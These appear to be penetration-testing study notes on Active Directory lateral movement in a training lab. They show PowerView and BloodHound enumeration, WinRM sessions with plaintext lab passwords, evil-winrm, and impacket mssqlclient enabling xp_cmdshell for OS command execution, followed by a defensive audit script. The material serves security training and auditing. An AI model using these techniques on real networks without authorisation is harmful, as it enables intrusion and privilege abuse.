- Once we gain a foothold in the domain, our goal shifts to advancing our position further by moving laterally or vertically to obtain access to other hosts, and eventually achieve domain compromise
- If we don't have local admin rights on any hosts yet, we can still move around the domain with RDP, PSRemoting/WinRM, or MSSQL Server
- We can do this easily with `BloodHound`, where the edges can show us what type of remote access privs a user has

![[images/Pasted image 20251104150227.png]]

- We can also use `PowerView` or built-in tools

# Enumerating Remote Desktop Users Group

- We can use `Get-NetLocalGroupMember` with `PowerView` to enumerate members of the `Remote Desktop Users` group on a given host
- Membership of this group enables access to the given host via RDP
- Below, all Domain Users are part of the `Remote Desktop Users` group
- This is common on Remote Desktop Services or jump hosts

```powershell
PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"
```

![[images/Pasted image 20251104152650.png]]

# Enumerating Remote Management Users Group

- We can also use `Get-NetLocalGroupMember` with `PowerView` to enumerate members of the `Remote Management Users` group on a given host
- Membership of this group enables access to the given host via WinRM

```powershell
PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"
```

![[images/Pasted image 20251104152700.png]]

# Enumerating Remote Groups with BloodHound

- Start up the `BloodHound` GUI on the Kali host

![[images/Pasted image 20251104153310.png]]
![[images/Pasted image 20251104153322.png]]

- Run `SharpHound.exe` on the Windows host and move the ZIP to the Kali host

![[images/Pasted image 20251104153348.png]]

- We can simply search for group names or use Cypher queries

![[images/Pasted image 20251104154517.png]]

# Establish a WinRM Session from Windows

- Use the PowerShell `Enter-PSSession` cmdlet

```powershell
PS C:\htb> $password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
PS C:\htb> $cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)
PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $cred
[ACADEMY-EA-MS01]: PS C:\Users\forend\Documents> hostname
ACADEMY-EA-MS01
[ACADEMY-EA-MS01]: PS C:\Users\forend\Documents> Exit-PSSession
PS C:\htb>
```

# Establish a WinRM Session from Linux

- Use `evil-winrm`

```shell-session
gem install evil-winrm                    # installs evil-winrm
evil-winrm                                # shows the help menu
evil-winrm -i 10.129.201.234 -u forend    # attempts to establish a WinRM session to the target host as the specified user
```

# Enumerating MSSQL Instances from Windows

- Use `PowerUpSQL` to enumerate MSSQL instances

```powershell
PS C:\htb> cd .\PowerUpSQL\
PS C:\htb> Import-Module .\PowerUpSQL.ps1
PS C:\htb> Get-SQLInstanceDomain
```

![[images/Pasted image 20251104155729.png]]

- Use `Get-SQLQuery` to authenticate to the MSSQL instance

```powershell
PS C:\htb> Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'
VERBOSE: 172.16.5.150,1433 : Connection Success.

Column1
-------
Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64) ...
```

# Enumerating MSSQL Instances from Linux

- Authenticate to the MSSQL instance using `mssqlclient.py` from the `impacket` suite

```bash
mssqlclient.py                                            # shows help menu
mssqlclient.py INLANEFREIGHT/[email protected] -windows-auth   # authenticates to the MSSQL instance
```

![[images/Pasted image 20251104160313.png]]

```bash
SQL> help                  # shows help menu
SQL> enable_xp_cmdshell    # enables execution of OS commands
SQL> xp_cmdshell whoami /priv
```

![[images/Pasted image 20251104160410.png]]
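The `Remote Desktop Users` / `Remote Management Users` enumeration above is also what a defender should run across the estate to find hosts where a domain-wide principal grants everyone RDP or WinRM. The script below is an added audit example, not part of the original notes or of PowerView; it uses only the built-in `Get-LocalGroupMember` cmdlet over WinRM. `ACADEMY-EA-MS01` comes from the notes above, the second host name is a placeholder, and the list of "broad" principals is an assumption you can extend.

```powershell
# Added audit example (not from the HTB module). Assumes WinRM is reachable and the
# calling account is a local admin on each host. Hosts beyond ACADEMY-EA-MS01 are placeholders.
$Hosts  = @('ACADEMY-EA-MS01', 'HOST2-PLACEHOLDER')
$Groups = @('Remote Desktop Users', 'Remote Management Users')
# Principals that effectively hand the group to every account in the domain (assumed list)
$Broad  = @('Domain Users', 'Authenticated Users', 'Everyone', 'Domain Computers')

$findings = foreach ($h in $Hosts) {
    foreach ($g in $Groups) {
        try {
            # Get-LocalGroupMember returns Name (DOMAIN\account), ObjectClass and PrincipalSource
            $members = Invoke-Command -ComputerName $h -ErrorAction Stop -ArgumentList $g -ScriptBlock {
                param($grp)
                Get-LocalGroupMember -Group $grp -ErrorAction Stop
            }
        } catch {
            # Unreachable host, missing group, or the orphaned-SID error the cmdlet throws
            Write-Warning "$h / $g : $($_.Exception.Message)"
            continue
        }
        foreach ($m in $members) {
            $account = ($m.Name -split '\\')[-1]   # strip the DOMAIN\ or HOST\ prefix
            [pscustomobject]@{
                Host      = $h
                Group     = $g
                Member    = $m.Name
                Class     = $m.ObjectClass        # User or Group
                Source    = $m.PrincipalSource    # Local or ActiveDirectory
                Overbroad = ($Broad -contains $account)
            }
        }
    }
}

# Overbroad = True means every domain account can RDP or WinRM to that host
$findings | Sort-Object Overbroad -Descending | Format-Table -AutoSize
$findings | Where-Object Overbroad | Export-Csv .\remote-access-audit.csv -NoTypeInformation
```

Nested groups are not expanded here; a domain group that merely contains `Domain Users` will show up as that group's name and needs a follow-up `Get-ADGroupMember -Recursive` check.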